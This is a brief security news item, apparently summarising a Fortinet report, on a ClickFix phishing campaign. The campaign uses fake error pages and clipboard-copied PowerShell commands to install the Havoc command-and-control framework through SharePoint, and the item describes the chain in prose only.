Havoc C2 framework spread in novel ClickFix phishing campaign

BleepingComputer reports that malicious actors have been distributing the Havoc post-exploitation command-and-control framework through a new ClickFix phishing campaign.

Attacks begin with the delivery of phishing emails purporting to be restricted notices that could only be read by opening an HTML attachment, according to a report from Fortinet FortiGuard Labs. Doing so triggers a bogus 0x8004de86 error with a "How to fix" button, which when clicked copies a PowerShell command to the clipboard before showing instructions for its execution that would then prompt another PowerShell script from a SharePoint server. While such a script would terminate should the device be found in a sandbox environment, it will prompt Windows Registry alterations for the eventual download of Havoc from the same SharePoint server. Aside from allowing the integration of malicious traffic in cloud services, Havoc also leverages Microsoft Graph's SharePoint APIs to enable command delivery and receipt, noted Fortinet researchers.